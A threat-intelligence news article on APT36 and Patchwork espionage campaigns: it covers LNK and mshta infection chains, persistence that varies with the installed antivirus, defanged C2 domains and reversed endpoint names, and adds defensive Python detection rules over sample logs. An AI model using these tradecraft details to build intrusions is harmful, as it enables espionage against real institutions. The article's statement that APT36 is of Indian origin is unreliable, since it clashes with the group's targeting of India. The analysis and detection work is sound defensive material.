The advanced persistent threat group known as Transparent Tribe has been linked to a new wave of cyber espionage operations targeting Indian government bodies, academic organizations, and strategically significant institutions. The attacks rely on a remote access trojan (RAT) designed to provide long-term, stealthy control over compromised systems.
According to a technical assessment published by CYFIRMA, the campaign uses highly deceptive delivery mechanisms, including a malicious Windows shortcut (LNK) file disguised as a legitimate PDF document. To reduce suspicion, the threat actor embeds authentic PDF content within the malicious file, making it appear genuine to victims.
Transparent Tribe — also tracked as APT36 — is a well-known cyber espionage group that has consistently targeted Indian entities for intelligence gathering. Believed to be state-sponsored and of Indian origin, the group has maintained operational activity since at least 2013.
Expanding Arsenal of Remote Access Trojans
Over the years, Transparent Tribe has continuously refined its malware ecosystem. The group has deployed multiple RAT families, including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT, each tailored to meet evolving operational needs.
In the most recent attacks, victims receive spear-phishing emails containing a ZIP archive. Inside the archive is a shortcut file that masquerades as a PDF document. When opened, the LNK file launches a remote HTML Application (HTA) using mshta.exe. This HTA script decrypts and executes the final RAT payload entirely in memory, helping the malware evade detection.
Simultaneously, the HTA downloads and opens a decoy PDF document, creating the illusion that a harmless file was accessed.
CYFIRMA said that the HTA script relies heavily on ActiveX components, particularly WScript.Shell, to interact with the Windows operating system. This allows the malware to profile the environment, manipulate runtime behaviour, and improve execution reliability — techniques frequently associated with malicious abuse of mshta.exe.
Adaptive Persistence Based on Antivirus Detection
One of the most notable features of this campaign is the malware’s ability to adjust its persistence strategy based on the antivirus software installed on the infected system.
- Kaspersky detected:
  - The malware creates a working directory at C:\Users\Public\core\, stores an obfuscated HTA payload, and establishes persistence by placing a malicious LNK file in the Windows Startup folder that launches the HTA via mshta.exe.
- Quick Heal detected:
  - Persistence is achieved using a batch script and a malicious LNK file placed in the Startup folder. The HTA payload is written to disk and executed through the batch file.
- Avast, AVG, or Avira detected:
  - The payload is directly copied into the Startup directory and executed from there.
- No recognized antivirus found:
  - The malware falls back on a layered approach that combines batch-file execution, registry-based persistence, and payload deployment before triggering execution.
A secondary HTA component drops a DLL named iinneldc.dll, which acts as a fully-featured RAT. The malware supports remote command execution, file management, data exfiltration, screenshot capture, clipboard monitoring, and process manipulation, granting attackers deep control over infected systems.
CYFIRMA emphasised that APT36 remains a highly persistent, intelligence-driven threat, maintaining a long-term focus on Indian government agencies, educational institutions, and other strategically sensitive sectors.
Related Campaign Using Government Advisory Lures
In parallel activity observed in recent weeks, APT36 has also been connected to another operation that uses a malicious shortcut file disguised as a government advisory PDF named “NCERT-Whatsapp-Advisory.pdf.lnk”.
This shortcut executes an obfuscated command via cmd.exe, downloading an MSI installer (nikmights.msi) from a remote server hosted at aeroclubofindia[.]co[.]in. The installer performs several actions:
- Displays a legitimate decoy PDF to the victim
- Decodes and drops DLL files at C:\ProgramData\PcDirvs\pdf.dll and wininet.dll
- Deploys and executes PcDirvs.exe after a 10-second delay
- Establishes persistence using a malicious HTA script that modifies the Windows Registry to launch the payload on every system startup
The decoy document displayed to victims is a genuine 2024 advisory issued by Pakistan’s National Cyber Emergency Response Team (PKCERT), warning about a fraudulent WhatsApp campaign, a tactic designed to enhance credibility and reduce suspicion.
The dropped wininet.dll communicates with a hard-coded command-and-control (C2) server hosted at dns.wmiprovider[.]com, which was registered in April 2025. Although the C2 infrastructure is currently inactive, registry-based persistence ensures the malware can be reactivated at any time.
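The behaviours described above (the mshta.exe HTA chain and its antivirus-dependent persistence branches, plus the PcDirvs MSI chain) translate directly into process-creation detection rules. The following is an added example, not code from CYFIRMA's report: it applies those rules to constructed Sysmon-style Event ID 1 records. The sample file names, user names and the URL host are invented; only the directory names come from the article.

```python
import re
from typing import Dict, List

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
# File names, users and the URL host are invented for the example; the directory
# names come from the behaviours the article describes.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\Public\core\stage.hta"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://lure-host.invalid/stage.hta",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\ProgramData\PcDirvs\PcDirvs.exe",
     "CommandLine": "PcDirvs.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
PUBLIC_CORE_RE = re.compile(r"\\Users\\Public\\core\\", re.IGNORECASE)
PCDIRVS_RE = re.compile(r"\\ProgramData\\PcDirvs\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def classify(event: Dict[str, str]) -> List[str]:
    """Return the article's tradecraft patterns that one event matches."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    hits: List[str] = []
    if image.lower().endswith("\\mshta.exe"):
        if URL_RE.search(cmd):
            hits.append("mshta_remote_hta")             # LNK launching a remote HTA
        if PUBLIC_CORE_RE.search(cmd) or STARTUP_RE.search(cmd):
            hits.append("mshta_local_hta_persistence")  # HTA in Public\core or Startup
    if STARTUP_RE.search(image):
        hits.append("payload_run_from_startup")         # payload copied into Startup
    if PCDIRVS_RE.search(image) or PCDIRVS_RE.search(cmd):
        hits.append("pcdirvs_msi_chain")                # PcDirvs.exe / wininet.dll drop
    return hits


def triage(events: List[Dict[str, str]]) -> List[tuple]:
    """Keep only events with at least one hit, as (Image, hits) pairs."""
    return [(e["Image"], classify(e)) for e in events if classify(e)]
```

The same rules apply unchanged to Windows Security 4688 events once the command line is logged, which is the main prerequisite for spotting the remote-HTA launch.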
The DLL implements multiple HTTP GET-based endpoints to communicate with the C2 server. To evade static detection, endpoint strings are stored in reverse order. Observed endpoints include:
- /retsiger – Registers the infected system
- /taebtraeh – Sends heartbeat beacons
- /dnammoc_teg – Executes attacker-issued commands via cmd.exe
- /dnammocmvitna – Handles anti-virtual machine behaviour
The malware also queries installed antivirus products, further enhancing its reconnaissance capabilities.
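Because the endpoint names are only reversed, not encrypted, a proxy-log check can undo the reversal and match the plain names. The following is an added example, not part of the CYFIRMA write-up: it reverses each request path from constructed Squid-style log lines, matches the four endpoints listed above, and goes one step further by flagging any reversed path that contains a common C2 verb. The host name in the sample lines is a placeholder, not the real C2 domain.

```python
import re
from urllib.parse import urlsplit

# The four reversed paths reported for wininet.dll; reversing them yields the
# plain endpoint names (/register, /heartbeat, /get_command, /antivmcommand).
OBSERVED_REVERSED = ["/retsiger", "/taebtraeh", "/dnammoc_teg", "/dnammocmvitna"]


def unreverse_path(path: str) -> str:
    """Undo the string reversal: '/retsiger' -> '/register'."""
    return "/" + path.lstrip("/")[::-1]


KNOWN_PLAIN = {unreverse_path(p) for p in OBSERVED_REVERSED}

# Generalisation beyond the four observed paths: verbs a reversed C2 path is
# likely to contain even if the exact endpoint differs between samples.
SUSPECT_TOKENS = ("register", "heartbeat", "command", "antivm")

# Constructed proxy log lines (timestamp client method url status). The host is
# a placeholder chosen for the example.
SAMPLE_LOG = """\
1733000000.101 10.0.0.5 GET http://c2-placeholder.invalid/retsiger 200
1733000030.220 10.0.0.5 GET http://c2-placeholder.invalid/taebtraeh 200
1733000031.004 10.0.0.7 GET http://intranet.invalid/index.html 200
1733000060.330 10.0.0.5 GET http://c2-placeholder.invalid/dnammoc_teg 200
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$")


def scan_line(line: str):
    """Return (client, path, unreversed_path, reason) or None for a clean line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    path = urlsplit(m["url"]).path or "/"
    plain = unreverse_path(path)
    if plain in KNOWN_PLAIN:
        return (m["client"], path, plain, "known_reversed_endpoint")
    if any(tok in plain.lower() for tok in SUSPECT_TOKENS):
        return (m["client"], path, plain, "reversed_c2_keyword")
    return None


def scan_log(text: str):
    """Apply scan_line to every line and keep the hits."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]
```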
Patchwork APT Linked to New StreamSpy Malware
The disclosure coincides with separate findings linking Patchwork, also known as Dropping Elephant or Maha Grass, to recent cyber operations targeting Pakistan’s defence sector.
Security researcher Idan Tarab revealed that the group has been deploying a Python-based backdoor delivered through phishing emails containing ZIP archives. These archives include a malicious MSBuild project that runs via msbuild.exe and eventually installs the Python RAT.
The backdoor allows attackers to communicate with a C2 server, execute Python modules, run system commands, and upload or download files.
Tarab described the campaign as a highly modernised, heavily obfuscated toolkit that combines MSBuild loaders, modified PyInstaller runtimes, marshalled bytecode implants, geofencing logic, randomised PHP C2 endpoints, and realistic persistence techniques.
As of December 2025, Patchwork has also been associated with a previously undocumented Trojan named StreamSpy. The malware uses WebSocket channels for command execution and response delivery, while HTTP is used for file transfers, helping it evade traditional traffic monitoring.
According to QiAnXin, StreamSpy shares technical similarities with Spyder, a backdoor variant related to WarHawk, which has been attributed to SideWinder. Patchwork’s use of Spyder-based tooling dates back to 2023.
StreamSpy Distribution and Capabilities
StreamSpy is distributed via ZIP files such as “OPS-VII-SIR.zip” hosted on firebasescloudemail[.]com. The contained executable (Annexure.exe) supports:
- System and disk enumeration
- Persistence via registry keys, scheduled tasks, or Startup folder LNK files
- C2 communication over HTTP and WebSocket
Supported commands include file download and execution, shell switching between cmd and PowerShell, file upload and deletion, directory enumeration, and encrypted payload delivery.
QiAnXin also noted that the same download infrastructure hosts Spyder variants with extensive data collection capabilities. Additionally, the malware’s digital signature overlaps with that of ShadowAgent, a RAT attributed to the DoNot Team (Brainworm). The 360 Threat Intelligence Centre previously flagged Annexure.exe as ShadowAgent in November 2025.
The findings suggest resource sharing and operational overlap between the Maha Grass and DoNot groups.
Final Assessment
Security researchers conclude that the emergence of StreamSpy, along with the continued development of RAT variants, demonstrates that both Transparent Tribe (APT36) and Patchwork (Maha Grass) remain active, adaptive, and strategically motivated threat actors.
By leveraging advanced evasion techniques, LOLBins, multi-stage loaders, and diversified persistence mechanisms, these groups continue to pose a serious threat to regional security and critical institutions.